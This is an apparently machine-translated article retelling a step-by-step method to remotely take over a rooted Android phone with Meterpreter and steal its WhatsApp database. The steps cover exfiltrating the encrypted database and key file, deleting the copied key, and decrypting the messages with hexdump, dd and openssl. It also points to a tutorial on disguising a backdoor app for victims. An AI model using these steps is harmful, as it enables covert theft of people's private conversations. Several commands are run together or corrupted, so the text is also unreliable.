Decryption: How attackers step by step win your WhatsApp Database

Decryption: How attackers step by step win your WhatsApp Database

 

This document describes how to remotely attack and decrypt the WhatsApp database on a root Android mobile device. In addition, this reminds us that root or jailbreak (iOS) mobile devices will expose users to hacker attacks.

A few hours ago, an interesting article entitled How to remotely crack and decrypt the WhatsApp database [ROOT] was published on the Internet. this article explains how to extract and decrypt the WhatsApp database from a root Android system. Although WhatsApp is usually very secure, root processing of Android devices may expose users to the risk of attacks.

Next, let's take A look at the attack scenarios proposed by the author (using anonymous F. E. A. R.

Step 1: Use and obtain access permissions for Android devices

As explained in this Guide, if the Android device uses the Meterpeter command for root, this phase will become simple.

 

 

To attack and decrypt the WhatsApp database, attackers need a key file in the data folder. The only way to access this file is to have root permissions. In addition, this key file is essential to decrypt the WhatsApp database.

Step 2: Download the database

Use the following command to download the database through Meterpreter:

Cd/sdcard/WhatsAppls (print the current directory) cd Databases download msgstore. db. crypt8 (this takes some time and may take a long time)

 

 

Step 3: extract the decryption key

Two sets of decryption keys are stored in the key files required to decrypt the WhatsApp database, that is, the actual encryption key K and an initialization vector named IV. It is worth mentioning that the WhatsApp key file is stored in a safe location. The following commands extract key files:

Shellsu (Super User access or only privilege escalation)

As F. E. A. R. explains, this is the most difficult part, especially if the target mobile user is an experienced and skilled user, because he must have installed the SuperSU application.

How to induce victims to install SuperSU?

Let's take a look at this tutorial published by bart, which explains how to disguise a backdoor application. However, if the victims in the following scenarios are not experienced or skilled users, the process will become simpler:

1. They did not install the SuperSU application. 2. For newly installed applications, they are not changed to PROMPT, rather than GRANT.

Run the following command to access the key folder and extract the decryption key.

Cd/data/datalscd com. whatsapp lscd filesls cp key/sdcard/Download (meaning to copy the file key to the/sdcard/Download folder)

Step 4: Download and decrypt the key file to the root directory

Download the extracted key file to the root directory, which also contains the encrypted WhatsApp database:

Cd/sdcard/Downloaddownload keyrm key (make sure you have deleted the key file)

Step 5: decrypt the WhatsApp Database

The article reported two different methods to decrypt WhatsApp:

(1) run the Linux Command: copy and paste a command each time. Do not write them as a script file; otherwise, it will not work properly:

hexdump -e '2/1 "%02x"' key | cut -b 253-316 > aes.txthexdump -n 67 -e '2/1 "%02x"' msgstore.db.crypt8 | cut -b 103-134 > iv.txtdd if=msgstore.db.crypt8 of=msgstore.db.crypt8.nohdr ibs=67 skip=1openssl enc -aes-256-cbc -d -nosalt -nopad -bufsize 16384 -in msgstore.db.crypt8.nohdr -K $(cat aes.txt) -iv $(cat iv.txt) > msgstore.gzgzip -cdq msgstore.gz > msgstore.db

If the 4th-line command cannot work, perform the following operations:

Hexdump-e '2017 "% 02x" 'key | cut-B 253-export hexdump-n 67-e '2017 "% 02x" 'msgstore. db. crypt8 | cut-B 103-134openssl enc-aes-256-cbc-d-nosalt-nopad-bufsize 16384-in msgstore. db. crypt8.nohdr-K (paste text document from 1st commands)-iv (paste text document from 2nd commands)> msgstore.gz

(2) The second method is based on the simple Windows WhatsApp Viewer application. You can take a look at the original article.

This is another lesson. root (Android) or jailbreak (iOS) for mobile devices will expose users to hacker attacks.